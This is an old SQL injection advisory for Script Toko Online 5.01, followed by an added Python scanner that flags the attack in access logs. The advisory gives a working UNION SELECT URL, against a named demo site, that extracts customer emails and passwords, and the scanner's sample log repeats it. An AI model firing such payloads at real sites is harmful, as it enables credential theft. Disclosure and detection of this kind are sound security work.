# Title : Script Toko Online 5.01 (shop_display_products.php) SQL Injection Vuln
# Published : 2009-01-26
# Author : k1n9k0ng
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts : Script Toko Online v5.01
Scripts site : http://www.gempar.com/
Discovered By : k1n9k0ng
My Site : http://www.sekuritionline.net
IRC Channel : #sekuritionline
Special To : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site :
http://www.gempar.com/demotoko/
Bug Found:
http://www.gempar.com/demotoko/shop_display_products.php?cat_id=-1 union select concat(email,0x3a,password),1,2,3,4,5,6,7 from naxtor_cart_store_customer/*
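A defensive check for the flaw above, as an added example that is not part of the original advisory: it scans web-server access logs for requests to shop_display_products.php whose cat_id is not a plain non-negative integer. The log lines, the combined log format and the function name are constructed for illustration, and it is an assumption (from the parameter name) that legitimate cat_id values are always numeric.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined log format), not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Jan/2009:10:00:01 +0000] "GET /demotoko/shop_display_products.php?cat_id=7 HTTP/1.1" 200 5120
203.0.113.9 - - [26/Jan/2009:10:00:02 +0000] "GET /demotoko/shop_display_products.php?cat_id=-1%20union%20select%20concat(email,0x3a,password),1,2,3,4,5,6,7%20from%20naxtor_cart_store_customer/* HTTP/1.1" 200 812
198.51.100.7 - - [26/Jan/2009:10:00:03 +0000] "GET /demotoko/shop_display_products.php?cat_id=12abc HTTP/1.1" 200 640
198.51.100.4 - - [26/Jan/2009:10:00:04 +0000] "GET /demotoko/index.php?cat_id=-1 HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
TARGET_SCRIPT = "shop_display_products.php"   # script named in the advisory
PARAM = "cat_id"                              # injectable parameter named in the advisory
# Triage hint only; the actual decision is the integer allowlist below.
SQL_HINTS = re.compile(r"union|select|concat|/\*|--|0x[0-9a-f]+", re.I)


def suspicious_requests(log_text):
    """Return (client_ip, decoded_value, sql_hint_seen) for each flagged request."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a parsable request line
        client, target = match.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/" + TARGET_SCRIPT):
            continue
        # parse_qs percent-decodes, so encoded and plain payloads compare equal.
        for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            if not re.fullmatch(r"[0-9]+", value):
                findings.append((client, value, bool(SQL_HINTS.search(value))))
    return findings


if __name__ == "__main__":
    for client, value, hinted in suspicious_requests(SAMPLE_LOG):
        label = "SQL keywords" if hinted else "non-integer"
        print(f"{client}\t{label}\t{value!r}")
```

The same integer allowlist, applied in the application before the value reaches the query and combined with a bound query parameter, is the fix on the server side.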